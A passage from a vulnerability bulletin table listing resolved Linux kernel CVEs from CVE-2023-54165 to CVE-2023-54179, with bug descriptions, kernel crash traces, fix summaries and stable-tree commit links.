0b eb 31 48 c7 c7 27 a8 70 82 e8 3e 45 3b 00 0f 0b eb 21 48 c7 [ 5695.054919] RSP: 0018:ffffc90027aef4f0 EFLAGS: 00010246 [ 5695.065366] RAX: 41fe484987275300 RBX: ffff888008988180 RCX: 0000000000000000 [ 5695.079636] RDX: ffff88886006c280 RSI: ffff888860060480 RDI: ffff888860060480 [ 5695.093904] RBP: 0000000000000002 R08: 0000000000000000 R09: ffffc90027aef370 [ 5695.108175] R10: 0000000000000000 R11: ffffffff82fdf1c0 R12: 0000000010000002 [ 5695.122447] R13: ffff888014b6a448 R14: ffff888014b6a420 R15: 00000000138dc240 [ 5695.136717] FS: 00007f23a7d3f740(0000) GS:ffff888860040000(0000) knlGS:0000000000000000 [ 5695.152899] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 5695.164388] CR2: 0000560ceaab6ac0 CR3: 000000001c06c001 CR4: 00000000007706e0 [ 5695.178659] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 5695.192927] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 5695.207197] PKRU: 55555554 [ 5695.212602] Call Trace: [ 5695.217486] <TASK> [ 5695.221674] zs_map_object+0x91/0x270 [ 5695.229000] zswap_frontswap_store+0x33d/0x870 [ 5695.237885] ? do_raw_spin_lock+0x5d/0xa0 [ 5695.245899] __frontswap_store+0x51/0xb0 [ 5695.253742] swap_writepage+0x3c/0x60 [ 5695.261063] shrink_page_list+0x738/0x1230 [ 5695.269255] shrink_lruvec+0x5ec/0xcd0 [ 5695.276749] ? shrink_slab+0x187/0x5f0 [ 5695.284240] ? mem_cgroup_iter+0x6e/0x120 [ 5695.292255] shrink_node+0x293/0x7b0 [ 5695.299402] do_try_to_free_pages+0xea/0x550 [ 5695.307940] try_to_free_pages+0x19a/0x490 [ 5695.316126] __folio_alloc+0x19ff/0x3e40 [ 5695.323971] ? __filemap_get_folio+0x8a/0x4e0 [ 5695.332681] ? walk_component+0x2a8/0xb50 [ 5695.340697] ? generic_permission+0xda/0x2a0 [ 5695.349231] ? __filemap_get_folio+0x8a/0x4e0 [ 5695.357940] ? walk_component+0x2a8/0xb50 [ 5695.365955] vma_alloc_folio+0x10e/0x570 [ 5695.373796] ? walk_component+0x52/0xb50 [ 5695.381634] wp_page_copy+0x38c/0xc10 [ 5695.388953] ? filename_lookup+0x378/0xbc0 [ 5695.397140] handle_mm_fault+0x87f/0x1800 [ 5695.405157] do_user_addr_fault+0x1bd/0x570 [ 5695.413520] exc_page_fault+0x5d/0x110 [ 5695.421017] asm_exc_page_fault+0x22/0x30 After some investigation, I have found the following issue: unlike other zswap backends, zsmalloc performs the LRU list update at the object mapping time, rather than when the slot for the object is allocated. This deviation was discussed and agreed upon during the review process of the zsmalloc writeback patch series: https://lore.kernel.org/lkml/Y3flcAXNxxrvy3ZH@cmpxchg.org/ Unfortunately, this introduces a subtle bug that occurs when there is a concurrent store and reclaim, which interleave as follows: zswap_frontswap_store() shrink_worker() zs_malloc() zs_zpool_shrink() spin_lock(&pool->lock) zs_reclaim_page() zspage = find_get_zspage() spin_unlock(&pool->lock) spin_lock(&pool->lock) zspage = list_first_entry(&pool->lru) ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54165 | https://git.kernel.org/stable/c/e95adf7486f2cb5f1bb303113ca30460951923e9 https://git.kernel.org/stable/c/d461aac924b937bcb4fd0ca1242b3ef6868ecddd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: igc: Fix Kernel Panic during ndo_tx_timeout callback The Xeon validation group has been carrying out some loaded tests with various HW configurations, and they have seen some transmit queue time outs happening during the test. This will cause the reset adapter function to be called by igc_tx_timeout(). Similar race conditions may arise when the interface is being brought down and up in igc_reinit_locked(), an interrupt being generated, and igc_clean_tx_irq() being called to complete the TX. When the igc_tx_timeout() function is invoked, this patch will turn off all TX ring HW queues during the igc_down() process. TX ring HW queues will be activated again during the igc_configure_tx_ring() process when performing the igc_up() procedure later. This patch also moves the existing igc_disable_tx_ring_hw() to avoid using a forward declaration. Kernel trace: [ 7678.747813] ------------[ cut here ]------------ [ 7678.757914] NETDEV WATCHDOG: enp1s0 (igc): transmit queue 2 timed out [ 7678.770117] WARNING: CPU: 0 PID: 13 at net/sched/sch_generic.c:525 dev_watchdog+0x1ae/0x1f0 [ 7678.784459] Modules linked in: xt_conntrack nft_chain_nat xt_MASQUERADE xt_addrtype nft_compat nf_tables nfnetlink br_netfilter bridge stp llc overlay dm_mod emrcha(PO) emriio(PO) rktpm(PO) cegbuf_mod(PO) patch_update(PO) se(PO) sgx_tgts(PO) mktme(PO) keylocker(PO) svtdx(PO) svfs_pci_hotplug(PO) vtd_mod(PO) davemem(PO) svmabort(PO) svindexio(PO) usbx2(PO) ehci_sched(PO) svheartbeat(PO) ioapic(PO) sv8259(PO) svintr(PO) lt(PO) pcierootport(PO) enginefw_mod(PO) ata(PO) smbus(PO) spiflash_cdf(PO) arden(PO) dsa_iax(PO) oobmsm_punit(PO) cpm(PO) svkdb(PO) ebg_pch(PO) pch(PO) sviotargets(PO) svbdf(PO) svmem(PO) svbios(PO) dram(PO) svtsc(PO) targets(PO) superio(PO) svkernel(PO) cswitch(PO) mcf(PO) pentiumIII_mod(PO) fs_svfs(PO) mdevdefdb(PO) svfs_os_services(O) ixgbe mdio mdio_devres libphy emeraldrapids_svdefs(PO) regsupport(O) libnvdimm nls_cp437 snd_hda_codec_realtek snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_intel_dspcfg snd_hda_codec snd_hwdep x86_pkg_temp_thermal snd_hda_core snd_pcm snd_timer isst_if_mbox_pci [ 7678.784496] input_leds isst_if_mmio sg snd isst_if_common soundcore wmi button sad9(O) drm fuse backlight configfs efivarfs ip_tables x_tables vmd sdhci led_class rtl8150 r8152 hid_generic pegasus mmc_block usbhid mmc_core hid megaraid_sas ixgb igb i2c_algo_bit ice i40e hpsa scsi_transport_sas e1000e e1000 e100 ax88179_178a usbnet xhci_pci sd_mod xhci_hcd t10_pi crc32c_intel crc64_rocksoft igc crc64 crc_t10dif usbcore crct10dif_generic ptp crct10dif_common usb_common pps_core [ 7679.200403] RIP: 0010:dev_watchdog+0x1ae/0x1f0 [ 7679.210201] Code: 28 e9 53 ff ff ff 4c 89 e7 c6 05 06 42 b9 00 01 e8 17 d1 fb ff 44 89 e9 4c 89 e6 48 c7 c7 40 ad fb 81 48 89 c2 e8 52 62 82 ff <0f> 0b e9 72 ff ff ff 65 8b 05 80 7d 7c 7e 89 c0 48 0f a3 05 0a c1 [ 7679.245438] RSP: 0018:ffa00000001f7d90 EFLAGS: 00010282 [ 7679.256021] RAX: 0000000000000000 RBX: ff11000109938440 RCX: 0000000000000000 [ 7679.268710] RDX: ff11000361e26cd8 RSI: ff11000361e1b880 RDI: ff11000361e1b880 [ 7679.281314] RBP: ffa00000001f7da8 R08: ff1100035f8fffe8 R09: 0000000000027ffb [ 7679.293840] R10: 0000000000001f0a R11: ff1100035f840000 R12: ff11000109938000 [ 7679.306276] R13: 0000000000000002 R14: dead000000000122 R15: ffa00000001f7e18 [ 7679.318648] FS: 0000000000000000(0000) GS:ff11000361e00000(0000) knlGS:0000000000000000 [ 7679.332064] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 7679.342757] CR2: 00007ffff7fca168 CR3: 000000013b08a006 CR4: 0000000000471ef8 [ 7679.354984] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 7679.367207] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400 [ 7679.379370] PKRU: 55555554 [ 7679.386446] Call Trace: [ 7679.393152] <TASK> [ 7679.399363] ? __pfx_dev_watchdog+0x10/0x10 [ 7679.407870] call_timer_fn+0x31/0x110 [ 7679.415698] e ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54166 | https://git.kernel.org/stable/c/feba294c454a51bb1e80dd2ff038e335f07ae481 https://git.kernel.org/stable/c/c09df09241fdd6aa5b94a5243369662a13ec608a https://git.kernel.org/stable/c/c12554d97fcd954d5c66bcd016586732cf240d0b https://git.kernel.org/stable/c/d4a7ce642100765119a872d4aba1bf63e3a22c8a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: m68k: mm: Move initrd phys_to_virt handling after paging_init() When booting with an initial ramdisk on platforms where physical memory does not start at address zero (e.g. on Amiga): initrd: 0ef0602c - 0f800000 Zone ranges: DMA [mem 0x0000000008000000-0x000000f7ffffffff] Normal empty Movable zone start for each node Early memory node ranges node 0: [mem 0x0000000008000000-0x000000000f7fffff] Initmem setup node 0 [mem 0x0000000008000000-0x000000000f7fffff] Unable to handle kernel access at virtual address (ptrval) Oops: 00000000 Modules linked in: PC: [<00201d3c>] memcmp+0x28/0x56 As phys_to_virt() relies on m68k_memoffset and module_fixup(), it must not be called before paging_init(). Hence postpone the phys_to_virt handling for the initial ramdisk until after calling paging_init(). While at it, reduce #ifdef clutter by using IS_ENABLED() instead. | 2025-12-30 | not yet calculated | CVE-2023-54167 | https://git.kernel.org/stable/c/ceb089e2337f810d3594d310953d9af4783f660a https://git.kernel.org/stable/c/58662cfb459150b9c0c22d20cddaea439b3844bd https://git.kernel.org/stable/c/d4b97925e87eb133e400fe4a482d750c74ce392f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mlx4: Prevent shift wrapping in set_user_sq_size() The ucmd->log_sq_bb_count variable is controlled by the user so this shift can wrap. Fix it by using check_shl_overflow() in the same way that it was done in commit 515f60004ed9 ("RDMA/hns: Prevent undefined behavior in hns_roce_set_user_sq_size()"). | 2025-12-30 | not yet calculated | CVE-2023-54168 | https://git.kernel.org/stable/c/3d5ae269c4bd392ec1edbfb3bd031b8f42d7feff https://git.kernel.org/stable/c/8feca625900777e02a449e53fe4121339934c38a https://git.kernel.org/stable/c/9ad3221c86cc9c6305594b742d4a72dfbd4ea579 https://git.kernel.org/stable/c/9911be2155720221a4f1f722b22bd0e2388d8bcf https://git.kernel.org/stable/c/3ce0df3493277b9df275cb8455d9c677ae701230 https://git.kernel.org/stable/c/196a6df08b08699ace4ce70e1efcdd9081b6565f https://git.kernel.org/stable/c/a183905869e692b6b7805b7472235585eff8e429 https://git.kernel.org/stable/c/d50b3c73f1ac20dabc53dc6e9d64ce9c79a331eb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: fix memory leak in mlx5e_ptp_open When kvzalloc_node or kvzalloc fails in mlx5e_ptp_open, the memory pointed to by "c" or "cparams" is not freed, which can lead to a memory leak. Fix by freeing the array in the error path. | 2025-12-30 | not yet calculated | CVE-2023-54169 | https://git.kernel.org/stable/c/4892e1e548b5bd6524c1c89df06e4849df26fc20 https://git.kernel.org/stable/c/83a8f7337a14cdb215c76a8f4cf3f3be8b59177d https://git.kernel.org/stable/c/7035e3ae600c4e9cb3dc220c24dd77112ddff8b1 https://git.kernel.org/stable/c/d543b649ffe58a0cb4b6948b3305069c5980a1fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: keys: Fix linking a duplicate key to a keyring's assoc_array When making a DNS query inside the kernel using dns_query(), the request code can in rare cases end up creating a duplicate index key in the assoc_array of the destination keyring. It is eventually found by a BUG_ON() check in the assoc_array implementation and results in a crash. Example report: [2158499.700025] kernel BUG at ../lib/assoc_array.c:652! [2158499.700039] invalid opcode: 0000 [#1] SMP PTI [2158499.700065] CPU: 3 PID: 31985 Comm: kworker/3:1 Kdump: loaded Not tainted 5.3.18-150300.59.90-default #1 SLE15-SP3 [2158499.700096] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020 [2158499.700351] Workqueue: cifsiod cifs_resolve_server [cifs] [2158499.700380] RIP: 0010:assoc_array_insert+0x85f/0xa40 [2158499.700401] Code: ff 74 2b 48 8b 3b 49 8b 45 18 4c 89 e6 48 83 e7 fe e8 95 ec 74 00 3b 45 88 7d db 85 c0 79 d4 0f 0b 0f 0b 0f 0b e8 41 f2 be ff <0f> 0b 0f 0b 81 7d 88 ff ff ff 7f 4c 89 eb 4c 8b ad 58 ff ff ff 0f [2158499.700448] RSP: 0018:ffffc0bd6187faf0 EFLAGS: 00010282 [2158499.700470] RAX: ffff9f1ea7da2fe8 RBX: ffff9f1ea7da2fc1 RCX: 0000000000000005 [2158499.700492] RDX: 0000000000000000 RSI: 0000000000000005 RDI: 0000000000000000 [2158499.700515] RBP: ffffc0bd6187fbb0 R08: ffff9f185faf1100 R09: 0000000000000000 [2158499.700538] R10: ffff9f1ea7da2cc0 R11: 000000005ed8cec8 R12: ffffc0bd6187fc28 [2158499.700561] R13: ffff9f15feb8d000 R14: ffff9f1ea7da2fc0 R15: ffff9f168dc0d740 [2158499.700585] FS: 0000000000000000(0000) GS:ffff9f185fac0000(0000) knlGS:0000000000000000 [2158499.700610] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [2158499.700630] CR2: 00007fdd94fca238 CR3: 0000000809d8c006 CR4: 00000000003706e0 [2158499.700702] Call Trace: [2158499.700741] ? key_alloc+0x447/0x4b0 [2158499.700768] ? __key_link_begin+0x43/0xa0 [2158499.700790] __key_link_begin+0x43/0xa0 [2158499.700814] request_key_and_link+0x2c7/0x730 [2158499.700847] ? dns_resolver_read+0x20/0x20 [dns_resolver] [2158499.700873] ? key_default_cmp+0x20/0x20 [2158499.700898] request_key_tag+0x43/0xa0 [2158499.700926] dns_query+0x114/0x2ca [dns_resolver] [2158499.701127] dns_resolve_server_name_to_ip+0x194/0x310 [cifs] [2158499.701164] ? scnprintf+0x49/0x90 [2158499.701190] ? __switch_to_asm+0x40/0x70 [2158499.701211] ? __switch_to_asm+0x34/0x70 [2158499.701405] reconn_set_ipaddr_from_hostname+0x81/0x2a0 [cifs] [2158499.701603] cifs_resolve_server+0x4b/0xd0 [cifs] [2158499.701632] process_one_work+0x1f8/0x3e0 [2158499.701658] worker_thread+0x2d/0x3f0 [2158499.701682] ? process_one_work+0x3e0/0x3e0 [2158499.701703] kthread+0x10d/0x130 [2158499.701723] ? kthread_park+0xb0/0xb0 [2158499.701746] ret_from_fork+0x1f/0x40 The situation occurs as follows: * Some kernel facility invokes dns_query() to resolve a hostname, for example, "abcdef". The function registers its global DNS resolver cache as current->cred.thread_keyring and passes the query to request_key_net() -> request_key_tag() -> request_key_and_link(). * Function request_key_and_link() creates a keyring_search_context object. Its match_data.cmp method gets set via a call to type->match_preparse() (resolves to dns_resolver_match_preparse()) to dns_resolver_cmp(). * Function request_key_and_link() continues and invokes search_process_keyrings_rcu(), which returns that a given key was not found. Control is then passed to request_key_and_link() -> construct_alloc_key(). * Concurrently to that, a second task similarly makes a DNS query for "abcdef." and its result gets inserted into the DNS resolver cache. * Back on the first task, function construct_alloc_key() first runs __key_link_begin() to determine an assoc_array_edit operation to insert a new key. Index keys in the array are compared exactly as-is, using keyring_compare_object(). The operation ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54170 | https://git.kernel.org/stable/c/65bd66a794bfa059375ec834885bb610d75c0182 https://git.kernel.org/stable/c/0a6b0ca58685be34979236f83f2b322635b80b32 https://git.kernel.org/stable/c/9aecfebea24fe6071ace5cc9fd6d690b87276bbb https://git.kernel.org/stable/c/00edfa6d4fe022942e2f2e6f3294ff13ef78b15c https://git.kernel.org/stable/c/e091bb55af9a930801f83df78195a908a76e1479 https://git.kernel.org/stable/c/d55901522f96082a43b9842d34867363c0cdbac5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tracing: Fix memory leak of iter->temp when reading trace_pipe kmemleak reports: unreferenced object 0xffff88814d14e200 (size 256): comm "cat", pid 336, jiffies 4294871818 (age 779.490s) hex dump (first 32 bytes): 04 00 01 03 00 00 00 00 08 00 00 00 00 00 00 00 ................ 0c d8 c8 9b ff ff ff ff 04 5a ca 9b ff ff ff ff .........Z...... backtrace: [<ffffffff9bdff18f>] __kmalloc+0x4f/0x140 [<ffffffff9bc9238b>] trace_find_next_entry+0xbb/0x1d0 [<ffffffff9bc9caef>] trace_print_lat_context+0xaf/0x4e0 [<ffffffff9bc94490>] print_trace_line+0x3e0/0x950 [<ffffffff9bc95499>] tracing_read_pipe+0x2d9/0x5a0 [<ffffffff9bf03a43>] vfs_read+0x143/0x520 [<ffffffff9bf04c2d>] ksys_read+0xbd/0x160 [<ffffffff9d0f0edf>] do_syscall_64+0x3f/0x90 [<ffffffff9d2000aa>] entry_SYSCALL_64_after_hwframe+0x6e/0xd8 When reading the file 'trace_pipe', 'iter->temp' is allocated or relocated in trace_find_next_entry() but not freed before 'trace_pipe' is closed. To fix it, free 'iter->temp' in tracing_release_pipe(). | 2025-12-30 | not yet calculated | CVE-2023-54171 | https://git.kernel.org/stable/c/1a1e793e021d75cd0accd8f329ec9456e5cd105e https://git.kernel.org/stable/c/954792db9f61b6c0b8a94b8831fed5f146014029 https://git.kernel.org/stable/c/be970e22c53d5572b2795b79da9716ada937023b https://git.kernel.org/stable/c/3f42d57a76e7e96585f08855554e002218cbca0c https://git.kernel.org/stable/c/d5a821896360cc8b93a15bd888fabc858c038dc0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/hyperv: Disable IBT when hypercall page lacks ENDBR instruction On hardware that supports Indirect Branch Tracking (IBT), Hyper-V VMs with ConfigVersion 9.3 or later support IBT in the guest. However, current versions of Hyper-V have a bug in that there's not an ENDBR64 instruction at the beginning of the hypercall page. Since hypercalls are made with an indirect call to the hypercall page, all hypercall attempts fail with an exception and Linux panics. A Hyper-V fix is in progress to add ENDBR64. But guard against the Linux panic by clearing X86_FEATURE_IBT if the hypercall page doesn't start with ENDBR. The VM will boot and run without IBT. If future Linux 32-bit kernels were to support IBT, additional hypercall page hackery would be needed to make IBT work for such kernels in a Hyper-V VM. | 2025-12-30 | not yet calculated | CVE-2023-54172 | https://git.kernel.org/stable/c/98cccbd0a19a161971bc7f7feb10577adc62c400 https://git.kernel.org/stable/c/73626b70b361ddda7c380e52c236aa4f2487c402 https://git.kernel.org/stable/c/d5ace2a776442d80674eff9ed42e737f7dd95056 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Disable preemption in bpf_event_output We received a report [1] of a kernel crash, which is caused by using nesting protection without disabled preemption. The bpf_event_output can be called by programs executed by the bpf_prog_run_array_cg function, which disables migration but keeps preemption enabled. This can cause a task to be preempted by another one inside the nesting protection and eventually lead to two tasks using the same perf_sample_data buffer and cause crashes like: BUG: kernel NULL pointer dereference, address: 0000000000000001 #PF: supervisor instruction fetch in kernel mode #PF: error_code(0x0010) - not-present page ... ? perf_output_sample+0x12a/0x9a0 ? finish_task_switch.isra.0+0x81/0x280 ? perf_event_output+0x66/0xa0 ? bpf_event_output+0x13a/0x190 ? bpf_event_output_data+0x22/0x40 ? bpf_prog_dfc84bbde731b257_cil_sock4_connect+0x40a/0xacb ? xa_load+0x87/0xe0 ? __cgroup_bpf_run_filter_sock_addr+0xc1/0x1a0 ? release_sock+0x3e/0x90 ? sk_setsockopt+0x1a1/0x12f0 ? udp_pre_connect+0x36/0x50 ? inet_dgram_connect+0x93/0xa0 ? __sys_connect+0xb4/0xe0 ? udp_setsockopt+0x27/0x40 ? __pfx_udp_push_pending_frames+0x10/0x10 ? __sys_setsockopt+0xdf/0x1a0 ? __x64_sys_connect+0xf/0x20 ? do_syscall_64+0x3a/0x90 ? entry_SYSCALL_64_after_hwframe+0x72/0xdc Fix this by disabling preemption in bpf_event_output. [1] https://github.com/cilium/cilium/issues/26756 | 2025-12-30 | not yet calculated | CVE-2023-54173 | https://git.kernel.org/stable/c/3048cb0dc0cc9dc74ed93690dffef00733bcad5b https://git.kernel.org/stable/c/c81bdf8f9f2b002d217c3d5357cdea9f2b82ff90 https://git.kernel.org/stable/c/36dd8ca330b76585640ed32255a3c99f901e1502 https://git.kernel.org/stable/c/063c9ce8e74e07bf94f99cd13146f42867875e8b https://git.kernel.org/stable/c/d62cc390c2e99ae267ffe4b8d7e2e08b6c758c32 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vfio: Fix NULL pointer dereference caused by uninitialized group->iommufd group->iommufd is not initialized for the iommufd_ctx_put() [20018.331541] BUG: kernel NULL pointer dereference, address: 0000000000000000 [20018.377508] RIP: 0010:iommufd_ctx_put+0x5/0x10 [iommufd] ... [20018.476483] Call Trace: [20018.479214] <TASK> [20018.481555] vfio_group_fops_unl_ioctl+0x506/0x690 [vfio] [20018.487586] __x64_sys_ioctl+0x6a/0xb0 [20018.491773] ? trace_hardirqs_on+0xc5/0xe0 [20018.496347] do_syscall_64+0x67/0x90 [20018.500340] entry_SYSCALL_64_after_hwframe+0x4b/0xb5 | 2025-12-30 | not yet calculated | CVE-2023-54174 | https://git.kernel.org/stable/c/8f24eef598ce7cce0bbefe0ec642bcc031d0f528 https://git.kernel.org/stable/c/d649c34cb916b015fdcb487e51409fcc5caeca8d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: i2c: xiic: xiic_xfer(): Fix runtime PM leak on error path The xiic_xfer() function gets a runtime PM reference when the function is entered. This reference is released when the function is exited. There is currently one error path where the function exits directly, which leads to a leak of the runtime PM reference. Make sure that this error path also releases the runtime PM reference. | 2025-12-30 | not yet calculated | CVE-2023-54175 | https://git.kernel.org/stable/c/2d320d9de7d31c0eb279b3f8a02cf1af473a3737 https://git.kernel.org/stable/c/72cb227a368cf286efb8ce1e741e8c7085747b4d https://git.kernel.org/stable/c/06e661a259978305c0015f6f33d14477a0cfbe8f https://git.kernel.org/stable/c/6027d84c073e26cb1b32a90d69c5fbad57776406 https://git.kernel.org/stable/c/688fdfc458bfa651dca39c736d39c1b7520af0e8 https://git.kernel.org/stable/c/d663d93bb47e7ab45602b227701022d8aa16040a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: stricter state check in mptcp_worker As reported by Christoph, the mptcp protocol can run the worker when the relevant msk socket is in an unexpected state: connect() // incoming reset + fastclose // the mptcp worker is scheduled mptcp_disconnect() // msk is now CLOSED listen() mptcp_worker() Leading to the following splat: divide error: 0000 [#1] PREEMPT SMP CPU: 1 PID: 21 Comm: kworker/1:0 Not tainted 6.3.0-rc1-gde5e8fd0123c #11 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.11.0-2.el7 04/01/2014 Workqueue: events mptcp_worker RIP: 0010:__tcp_select_window+0x22c/0x4b0 net/ipv4/tcp_output.c:3018 RSP: 0018:ffffc900000b3c98 EFLAGS: 00010293 RAX: 000000000000ffd7 RBX: 000000000000ffd7 RCX: 0000000000000000 RDX: 0000000000000000 RSI: ffffffff8214ce97 RDI: 0000000000000004 RBP: 000000000000ffd7 R08: 0000000000000004 R09: 0000000000010000 R10: 000000000000ffd7 R11: ffff888005afa148 R12: 000000000000ffd7 R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffff88803ed00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000405270 CR3: 000000003011e006 CR4: 0000000000370ee0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> tcp_select_window net/ipv4/tcp_output.c:262 [inline] __tcp_transmit_skb+0x356/0x1280 net/ipv4/tcp_output.c:1345 tcp_transmit_skb net/ipv4/tcp_output.c:1417 [inline] tcp_send_active_reset+0x13e/0x320 net/ipv4/tcp_output.c:3459 mptcp_check_fastclose net/mptcp/protocol.c:2530 [inline] mptcp_worker+0x6c7/0x800 net/mptcp/protocol.c:2705 process_one_work+0x3bd/0x950 kernel/workqueue.c:2390 worker_thread+0x5b/0x610 kernel/workqueue.c:2537 kthread+0x138/0x170 kernel/kthread.c:376 ret_from_fork+0x2c/0x50 arch/x86/entry/entry_64.S:308 </TASK> This change addresses the issue by explicitly checking for bad states before running the mptcp worker. | 2025-12-30 | not yet calculated | CVE-2023-54176 | https://git.kernel.org/stable/c/f0b4a4086cf27240fc621a560da9735159049dcc https://git.kernel.org/stable/c/aff9099e9c51f15c8def05c75b2b73e8487b5d54 https://git.kernel.org/stable/c/19ea79e87af32c2b3c6fc49bd84efeb35ca57678 https://git.kernel.org/stable/c/d6a0443733434408f2cbd4c53fea6910599bab9e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: quota: fix warning in dqgrab() There's an issue as follows when doing fault injection: WARNING: CPU: 1 PID: 14870 at include/linux/quotaops.h:51 dquot_disable+0x13b7/0x18c0 Modules linked in: CPU: 1 PID: 14870 Comm: fsconfig Not tainted 6.3.0-next-20230505-00006-g5107a9c821af-dirty #541 RIP: 0010:dquot_disable+0x13b7/0x18c0 RSP: 0018:ffffc9000acc79e0 EFLAGS: 00010246 RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffff88825e41b980 RDX: 0000000000000000 RSI: ffff88825e41b980 RDI: 0000000000000002 RBP: ffff888179f68000 R08: ffffffff82087ca7 R09: 0000000000000000 R10: 0000000000000001 R11: ffffed102f3ed026 R12: ffff888179f68130 R13: ffff888179f68110 R14: dffffc0000000000 R15: ffff888179f68118 FS: 00007f450a073740(0000) GS:ffff88882fc00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007ffe96f2efd8 CR3: 000000025c8ad000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> dquot_load_quota_sb+0xd53/0x1060 dquot_resume+0x172/0x230 ext4_reconfigure+0x1dc6/0x27b0 reconfigure_super+0x515/0xa90 __x64_sys_fsconfig+0xb19/0xd20 do_syscall_64+0x39/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd The above issue may happen as follows: ProcessA ProcessB ProcessC sys_fsconfig vfs_fsconfig_locked reconfigure_super ext4_remount dquot_suspend -> suspend all type quota sys_fsconfig vfs_fsconfig_locked reconfigure_super ext4_remount dquot_resume ret = dquot_load_quota_sb add_dquot_ref do_open -> open file O_RDWR vfs_open do_dentry_open get_write_access atomic_inc_unless_negative(&inode->i_writecount) ext4_file_open dquot_file_open dquot_initialize __dquot_initialize dqget atomic_inc(&dquot->dq_count); __dquot_initialize __dquot_initialize dqget if (!test_bit(DQ_ACTIVE_B, &dquot->dq_flags)) ext4_acquire_dquot -> Return error DQ_ACTIVE_B flag isn't set dquot_disable invalidate_dquots if (atomic_read(&dquot->dq_count)) dqgrab WARN_ON_ONCE(!test_bit(DQ_ACTIVE_B, &dquot->dq_flags)) -> Trigger warning In the above scenario, 'dquot->dq_flags' having no DQ_ACTIVE_B is normal when dqgrab() is called. To solve the above issue, just replace the dqgrab() use in invalidate_dquots() with atomic_inc(&dquot->dq_count). | 2025-12-30 | not yet calculated | CVE-2023-54177 | https://git.kernel.org/stable/c/6478eabc92274efae6269da7c515ba2b4c8e88d8 https://git.kernel.org/stable/c/965bad2bf1afef64ec16249da676dc7310cca32e https://git.kernel.org/stable/c/3f378783c47b5749317ea008d8c931d6d3986d8f https://git.kernel.org/stable/c/cbaebbba722cb9738c55903efce11f51cdd97bee https://git.kernel.org/stable/c/579d814de87c3cac69c9b261efa165d07cde3357 https://git.kernel.org/stable/c/6432843debe1ec7d76c5b2f76c67f9c5df22436e https://git.kernel.org/stable/c/6f4e543d277a12dfeff027e6ab24a170e1bfc160 https://git.kernel.org/stable/c/d6a95db3c7ad160bc16b89e36449705309b52bcb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: of: unittest: fix null pointer dereferencing in of_unittest_find_node_by_name() When kmalloc() fails to allocate memory in kasprintf(), name or full_name will be NULL, and strcmp() will cause a null pointer dereference. | 2025-12-30 | not yet calculated | CVE-2023-54178 | https://git.kernel.org/stable/c/c364fa869b33ca42a263bf91c22fce7e6c61d479 https://git.kernel.org/stable/c/0b7d715511915a1b39f5fdcbe57a7922dfd66513 https://git.kernel.org/stable/c/dadf0d0dfcc81cdcb27ba5426676d13a9e4fb925 https://git.kernel.org/stable/c/f41c65f8d05be734898cbe72af59a401b97d298a https://git.kernel.org/stable/c/ea5bc6f5aa099e3e84d037282836234ad77cba88 https://git.kernel.org/stable/c/43cc228099c514467b8074d7ede6673cef9f33b9 https://git.kernel.org/stable/c/c74ae8124f9687062dd99858f34c9d027ddd73da https://git.kernel.org/stable/c/2dd8ee9de71ad8447f8459fb01dade7f6c7132da https://git.kernel.org/stable/c/d6ce4f0ea19c32f10867ed93d8386924326ab474 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: Array index may go out of bound Klocwork reports array 'vha->host_str' of size 16 may use index value(s) 16..19. Use snprintf() instead of sprintf(). | 2025-12-30 | not yet calculated | CVE-2023-54179 | https://git.kernel.org/stable/c/e697f466bf61280b7e996c9ea096d7ec371c31ea https://git.kernel.org/stable/c/ea64c727f20123342020257cfa956fbfbd6d12ff https://git.kernel.org/stable/c/bcd773969a87d9802053c0db5be84abd6594a024 https://git.kernel.org/stable/c/748d8f8698a2f48ffe32dd7b35dbab1810ed1f82 https://git.kernel.org/stable/c/2b3bdef089b920b4a19fefb4f4e6dda56a4bb583 https://git.kernel.org/stable/c/e934737e18ff069a66cd53cd7f7a0b34ae2c24fe https://git.kernel.org/stable/c/d721b591b95cf3f290f8a7cbe90aa2ee0368388d |
